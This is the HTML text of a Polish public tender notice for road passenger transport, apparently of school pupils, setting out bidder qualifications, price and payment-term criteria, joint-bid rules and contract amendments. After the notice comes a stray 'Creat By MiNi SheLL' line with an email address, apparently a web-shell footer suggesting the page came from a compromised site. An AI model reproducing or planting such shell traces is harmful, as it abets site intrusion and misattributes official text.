wydłużenie tych okresów jest możliwe. W takim przypadku zadeklarowanie dłuższego okresu będzie<br/>powodować odpowiednią punktację w kryteriach oceny ofert<br/>2. Zmawiający nie wymaga osobistego wykonania przez Wykonawcę kluczowych zadań dotyczących usług objętych przedmiotem zamówienia.<br/>3. Katalogi elektroniczne – Zamawiający nie wymaga złożenia oferty w postaci katalogów elektronicznych<br/>4. Ponadto Zamawiający wymaga, aby pojazdy przeznaczone do realizacji przedmiotu zamówienia posiadały wydzielone miejsca dla osób<br/>niepełnosprawnych – min 2 pojazdy w każdym z autobusów.<br/>Wymagania związane z zatrudnieniem na podstawie stosunku pracy<br/>1. Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę w rozumieniu aktualnych przepisów Kodeksu<br/>Pracy osób wykonujących czynności w zakresie realizacji zamówienia:<br/>a) Kierowanie pojazdami skierowanymi do realizacji przedmiotu zamówienia </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni i porówna jedynie te oferty, które nie zostały odrzucone:<br/>2. Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria, przy założeniu, iż 1%=1pkt:<br/>3.	maksymalna liczba punktów, jaką może uzyskać oferta w danej części wynosi 100,00. Zamawiający wyliczając liczbę punktów dokona obliczeń z dokładnością do dwóch miejsc po przecinku.<br/>4.	Jeżeli Wykonawca zaproponuje termin płatności powyżej wartości maksymalnej, wówczas do wyliczenia punktacji w tym kryterium będzie przyjmowana wartość 30 dni,<br/>5.	Jeżeli Wykonawca w swej ofercie zamówienia nie określił terminu płatności, albo też zaproponuje termin krótszy niż określone powyżej terminy minimalne, będzie to uznane za niezgodność oferty z warunkami zamówienia i oferta taka podlegać będzie odrzuceniu, na podstawie art. 226 ust 1 pkt 5 ustawy<br/>6.	Zamawiający udzieli niniejszego zamówienia w danej części Wykonawcy, którego oferta uzyska w tej części najwyższą sumę punktów zdobytych w kryterium cena i deklarowany termin płatności, zgodnie ze wzorem:<br/><br/>SP = K1 + K2<br/><br/>Gdzie symbol SP – suma liczby punktów w poszczególnych kryteriach ceny ofert<br/> K1 – liczba punktów w kryterium „cena&#34;<br/>K2 – liczba punktów w kryterium „deklarowany termin płatności”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">deklarowany termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zamawiający wymaga, aby Wykonawca posiadał uprawnienia do prowadzenia działalności gospodarczej lub zawodowej w zakresie przewozu<br/>drogowego osób i wykonywania krajowego transportu drogowego osób o których mowa w ustawie z dnia 6 września 2001 r. o transporcie drogowym<br/>(tekst jednolity Dz. U. z 2022 r. poz. 180 z późn. zm.)<br/>2. Zamawiający wymaga, aby Wykonawca znajdował się w sytuacji ekonomicznej lub finansowej gwarantującej należyte wykonanie zamówienia<br/>publicznego, tzn. posiadał: ubezpieczenie od odpowiedzialności cywilnej i NNW w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia na sumę gwarancyjną w wysokości co najmniej 100 000,00 zł.<br/>3.Zamawiający wymaga, aby Wykonawca potwierdził posiadanie zdolności technicznej<br/>lub zawodowej poprzez wykazanie:<br/>a) Wykonania co najmniej 1 usługi transportu drogowego osób o wartości co najmniej 150.000 zł i liczbie przewożonych osób co najmniej 150,<br/>odpowiadającej swoim rodzajem przedmiotowi zamówienia<br/>b) Skierowania do realizacji zamówienia publicznego co najmniej 4 kierowców posiadających minimum 3-letnie doświadczenie w przewożeniu osób,<br/>ważne prawo jazdy kategorii D i ważne świadectwo kwalifikacji lub inne równoważne pod względem znaczenia, uprawnień i kwalifikacji dokumenty<br/>potwierdzające spełnianie warunku określonego przez Zamawiającego<br/>c) Posiadania co najmniej 4 autobusów posiadających aktualne przeglądy techniczne i ubezpieczenie OC i łączną liczbę miejsc co najmniej 150,<br/>dostępnych Wykonawcy wraz z informacją o podstawie dysponowania tymi zasobami <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków<br/>dowodowych na potwierdzenie niepodleganiu wykluczeniu z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania<br/>warunku udziału w postepowaniu w zakresie posiadania uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej Zamawiający wymaga<br/>złożenia aktualnej licencji na wykonywanie krajowego transportu drogowego osób, o której mowa w ustawie z dnia 6 września 2001 r. o transporcie drogowym<br/>(tekst jednolity Dz. U. z 2022 r. poz. 180 zm.) lub innych dokumentów równoważnie potwierdzających posiadanie uprawnień do przewozu osób i wykonywania<br/>krajowego transportu drogowego osób<br/>Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej jest spełniony, jeżeli co najmniej jeden z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi,<br/>do których realizacji te uprawnienia są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy<br/>W celu potwierdzenia spełniania warunku udziału w postępowaniu polegającego na znajdowaniu się w sytuacji ekonomicznej i finansowej gwarantującej należytą<br/>realizację zamówienia publicznego, Zamawiający wymaga, aby Wykonawca przedstawił dokumenty potwierdzające, że Wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej i NNW w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej w wysokości co<br/>najmniej 100 000,00 zł tego ubezpieczenia<br/>W celu potwierdzenia spełniania przez Wykonawcę warunku udziału w postępowaniu dotyczącego zdolności technicznej lub zawodowej, Zamawiający wymaga,<br/>aby Wykonawca przedstawił następujące podmiotowe środki dowodowe:<br/>a) Wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych w okresie ostatnich 3 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na<br/>rzecz których te usługi zostały wykonane lub są wykonywane oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane<br/>należycie. Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w<br/>przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje lub inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy<br/>b) Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz o postawie dysponowania tymi osobami.<br/>c) Wykazu autobusów dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie dysponowania tymi autobusami</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez Zamawiającego podmiotowych środków dowodowych<br/>potwierdzających warunek udziału w postępowaniu w zakresie znajdowania się w sytuacji ekonomicznej lub finansowej, Wykonawca składa inne<br/>podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez Zamawiającego warunku udziału wpostępowaniu.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi Wykonawcami wykaz usług dotyczy usług, w<br/>których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>Oceniając zdolność techniczną lub zawodową Zmawiający może, na każdym etapie postępowania uznać, iż Wykonawca nie posiada wymaganych<br/>zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych<br/>Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy, może mieć negatywny wpływ na realizację zamówienia<br/>W odniesieniu do warunków dotyczących WYKSZTAŁCENIA, KWALIFIKACJI ZAWODOWYCH LUB DOŚWIADCZENIA wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są<br/>wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie z art. 117 ust 4, z<br/>którego wynika, które usługi wykonają poszczególni Wykonawcy<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby składa, wraz z ofertą zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów<br/>2. Ponadto Zamawiający informuje, iż Wykonawca, podwykonawca, podmiot udostępniający zasoby oraz żaden z Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia uczestniczący w postępowaniu nie mogą podlegać wykluczeniu na podstawie art. 7 ust 1 ustawy z dnia 13 kwietnia 2022<br/>roku o szczególnych rozwiązaniach w zakresie przeciwdziałaniu wspierania agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>20. Na dzień składania ofert każdy Wykonawca powinien złożyć następujące dokumenty:<br/>a) formularz oferty sporządzony na podstawie wzoru stanowiącego załącznik nr 1;<br/>b) oświadczenia z art. 125 ust. 1 ustawy Wykonawcy potwierdzające spełnianie warunków udziału w postępowaniu o treści zgodnej z załącznikiem nr 2;<br/>c) oświadczenie z art. 125 ust 1 ustawy Wykonawcy potwierdzające brak podstaw do wykluczenia o treści zgodnej z załącznikiem nr 3<br/>d) wykaz części zamówienia, których wykonanie zostanie powierzone podwykonawcy o treści zgodnej z załącznikiem nr 10 – jeżeli dotyczy<br/>e) zobowiązanie podmiotu udostępniającego zasoby – jeżeli dotyczy, o treści zgodnej z załącznikiem nr 11<br/>f) oświadczenie z art. 125 ust 5 ustawy podmiotu udostępniającego zasoby potwierdzające niepodleganie wykluczeniu z postępowania i spełnianie<br/>warunków udziału w postępowaniu o treści zgodnej z załącznikiem nr 4 jeżeli dotyczy<br/>g) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie z art. 117 ust 4 ustawy, z którego wynika, które roboty<br/>budowlane wykonają poszczególni Wykonawcy o treści zgodnej z załącznikiem nr 9<br/>h) stosowne pełnomocnictwa lub inne dokumenty potwierdzające umocowanie do reprezentowania Wykonawcy w przypadku, gdy nie wynika ono<br/>bezpośrednio z dokumentów dołączonych do oferty;<br/>i) w przypadku Wykonawców wspólnie ubiegających się o realizację zamówienia dokument ustanawiający Pełnomocnika do reprezentowania w<br/>postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego lub inne dokumenty<br/>potwierdzające umocowanie osoby reprezentującej Wykonawców wspólnie ubiegających się o udzielenie zamówienia do ich reprezentowania <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienie, zgodnie z art. 58 w związku z art. 445 ust 1 ustawy PZP Zamawiający<br/>żąda aby: 1) W przypadku oferty składanej wspólnie przez Wykonawców oświadczenie z art. 125 ust 1, oświadczenie z art. 7 ust 1<br/>ustawy z dnia 13 kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego, składa każdy z Wykonawców odrębnie. Oświadczenia te potwierdzają brak podstawy wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>Wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia uznaje się, iż warunek dotyczący uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej jest spełniony, jeśli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te<br/>uprawnienia są wymagane. 3) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te<br/>zdolności są wymagane. 4) W przypadku, o którym mowa w ust 2 i 3 powyżej, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy 5) Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia ustanawiają Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Załączone Pełnomocnictwo powinno zawierać: jednoznaczne określenie<br/>postępowania, do którego się odnosi i precyzować zakres umocowania; wymieniać wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia i zawierać podpisy każdego z nich; 6) Jeżeli w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia działa osoba,<br/>której umocowanie do ich reprezentowania nie wynika z dokumentów takich jak KRS lub odpis z właściwego rejestru, Zamawiający będzie wymagał od<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia przedstawienia pełnomocnictwa lub innego dokumentu potwierdzającego<br/>umocowanie tej osoby do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 7) Wszelka korespondencja prowadzona<br/>będzie wyłącznie z Pełnomocnikiem lub osobą działającą w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>8) W przypadku wyboru przez Zamawiającego oferty złożonej przez Wykonawców wspólnie ubiegających się o zamówienie, Wykonawcy zobowiązani<br/>będą do przedłożenia umowy regulującej współpracę Wykonawców w terminie nie krótszym niż 7 dni przed podpisaniem umowy w sprawie zamówienia<br/>publicznego; 9) Umowa , o której mowa w ust 8 niniejszego rozdziału winna zawierać w szczególności: oznaczenie stron, cel działania, czas trwania<br/>umowy, zasady współdziałania , w tym zakres prac powierzonych każdej ze stron oraz zasady dokonywania rozliczeń, w tym nazwę banku i numer<br/>rachunku, na który dokonywane będą płatności z tytułu realizacji zamówienia. 10) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany umowy są dopuszczalne wyłącznie w trybie art. 455 ustawy z dnia 11 września 2019 roku Prawo zamówień publicznych (Dz. U.<br/>2021 r., poz. 1129 ze zm.).<br/>2. Zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy jest możliwa w przypadkach<br/>opisanych poniżej z zastrzeżeniem, że strony umowy wyrażają zgodę na wprowadzenie zmian tj.:<br/>a) zmian dotyczących podwykonawcy, przy czym jeżeli zmiana albo rezygnacja z podwykonawstwa dotyczy podmiotu, na którego zasoby Wykonawca<br/>powoływał się, na zasadach określonych w art. 118 ust. 1 ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca jest<br/>zobowiązany wykazać Zamawiającemu, że proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż<br/>podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia,<br/>b) zmiana liczby uczniów, przekraczająca poziom 20% ogólnej liczby przewożonych uczniów,<br/>c) zmiana wynagrodzenia Wykonawcy w związku ze zmianą opisaną w ust. 2 lit. b<br/>z zastrzeżeniem, iż ceny biletów określone w ofercie nie ulegną zmianie<br/>d) zmiana autobusów, którymi realizowany będzie dowóz możliwa jest pod warunkiem, iż inny pojazd będzie spełniał co najmniej warunki techniczne i<br/>inne określone w złożonej ofercie w stosunku do pojazdów w niej zaproponowanej<br/>e) zmiana osób uczestniczących w wykonaniu zamówienia pod warunkiem, że inne osoby będą posiadać co najmniej kwalifikacje równe wskazanym w<br/>ofercie osobom,<br/>f) zmiany zaistniałe z przyczyn organizacyjnych np.: zmiana danych teleadresowych lub innych danych podmiotowych, itp.<br/>g) zmiana wynagrodzenia spowodowana zmianą cen paliwa, przy czym zmiana ta powinna przekroczyć poziom 10% w stosunku do uśrednionej ceny<br/>paliwa na co najmniej 3 stacjach paliw na terenie Lęborka z dnia zawarcia umowy - ……..zł/l. Zamawiający dopuszcza dokonywanie zmian na powyższej<br/>podstawie nie częściej niż jeden raz na kwartał.<br/>3. Umowa może zostać rozwiązana w przypadku zmian prawa, które będą miały wpływ na warunki realizacji przedmiotu umowy.<br/>4. Zmiany dokonywane są poprzez złożenie wniosku o zmianę w formie pisemnej przez jedną ze stron z określeniem zmiany i uzasadnieniem zmiany.<br/>5. Strony zawierają stosowny aneks w celu dokonania zmian w niniejszej umowie <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę składa się w języku polskim pod rygorem nieważności w formie elektronicznej lub postaci elektronicznej, opatrzonej podpisem zaufanym lub podpisem osobistym na Platformie dostępnej pod adresem https://cewice.ezamawiajacy.pl w zakładce OFERTY</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-17 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-15</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli Wykonawca,<br/>wraz z przekazaniem tych informacji zastrzegł, że nie mogą być one udostępnione oraz wykazał, iż zastrzeżone informacje stanowią<br/>tajemnicę przedsiębiorstwa. W przypadku, gdy dokumenty elektroniczne w postępowaniu, przekazywane przy użyciu środków komunikacji<br/>elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa Wykonawca w celu utrzymania w poufności tych informacji, przekazuje je w<br/>wydzielonym i odpowiednio wydzielonym pliku. Wykonawca nie może zastrzec informacji zawartych w ofercie dotyczących nazwy lub imion i nazwisk<br/>oraz siedziby lub miejsca prowadzenia działalności gospodarczej albo miejsca zamieszkania oraz ceny. Proponuje się, aby zastrzeżenie dokonane było<br/>przez złożenie oferty w dwóch częściach opisanych jako „część jawna oferty” oraz „część zastrzeżona oferty”. Zgodnie z art. 11 ust 2 ustawy z dnia 16<br/>kwietnia 1993 r o zwalczaniu nieuczciwej konkurencji (Dz. U. 2018 poz. 419) poprzez pojęcie tajemnicy przedsiębiorstwa rozumie się informacje<br/>techniczne, technologiczne, organizacyjne przedsiębiorstwa lub inne<br/>informacje posiadające wartość gospodarczą, które jako całość lub w<br/>szczególnym zestawieniu i zbiorze ich elementów nie są powszechnie znane osobom zwykle zajmującym się tym rodzajem informacji albo nie są łatwo<br/>dostępne dla takich osób, o ile uprawniony do korzystania z informacji lub rozporządzania nimi podjął, przy zachowaniu należytej staranności, działania<br/>w celu utrzymania ich poufności.

Creat By MiNi SheLL
Email: jattceo@gmail.com